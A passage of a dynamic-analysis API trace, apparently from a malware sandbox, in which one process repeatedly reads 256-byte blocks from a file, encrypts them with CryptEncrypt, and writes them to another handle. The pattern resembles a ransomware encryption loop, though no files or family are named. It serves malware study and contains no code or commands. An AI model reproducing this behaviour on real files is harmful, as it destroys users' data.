WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.328] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.328] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.328] GetLastError () returned 0x0 [0163.328] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.328] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.328] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.328] GetLastError () returned 0x0 [0163.328] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.328] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.328] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.328] GetLastError () returned 0x0 [0163.328] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.328] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.328] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.328] GetLastError () returned 0x0 [0163.328] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.328] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.328] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.328] GetLastError () returned 0x0 [0163.328] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.329] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.329] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.329] GetLastError () returned 0x0 [0163.329] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.329] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.329] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.329] GetLastError () returned 0x0 [0163.329] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.329] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.329] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.329] GetLastError () returned 0x0 [0163.329] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.329] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.329] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.329] GetLastError () returned 0x0 [0163.329] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.329] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.329] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.329] GetLastError () returned 0x0 [0163.329] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.329] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.329] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.329] GetLastError () returned 0x0 [0163.329] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.329] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.329] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.330] GetLastError () returned 0x0 [0163.330] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.330] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.330] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.330] GetLastError () returned 0x0 [0163.330] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.330] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.330] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.330] GetLastError () returned 0x0 [0163.330] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.330] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.330] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.330] GetLastError () returned 0x0 [0163.330] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.330] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.330] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.330] GetLastError () returned 0x0 [0163.330] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.330] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.330] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.330] GetLastError () returned 0x0 [0163.330] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.330] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.330] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.330] GetLastError () returned 0x0 [0163.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.331] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.331] GetLastError () returned 0x0 [0163.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.331] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.331] GetLastError () returned 0x0 [0163.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.331] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.331] GetLastError () returned 0x0 [0163.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.331] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.331] GetLastError () returned 0x0 [0163.331] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.331] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.332] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.332] GetLastError () returned 0x0 [0163.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.332] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.332] GetLastError () returned 0x0 [0163.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.332] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.332] GetLastError () returned 0x0 [0163.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.332] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.332] GetLastError () returned 0x0 [0163.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.332] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.332] GetLastError () returned 0x0 [0163.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.332] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.332] GetLastError () returned 0x0 [0163.332] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.332] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.333] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.333] GetLastError () returned 0x0 [0163.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.333] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.333] GetLastError () returned 0x0 [0163.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.333] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.333] GetLastError () returned 0x0 [0163.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.333] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.333] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.333] GetLastError () returned 0x0 [0163.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 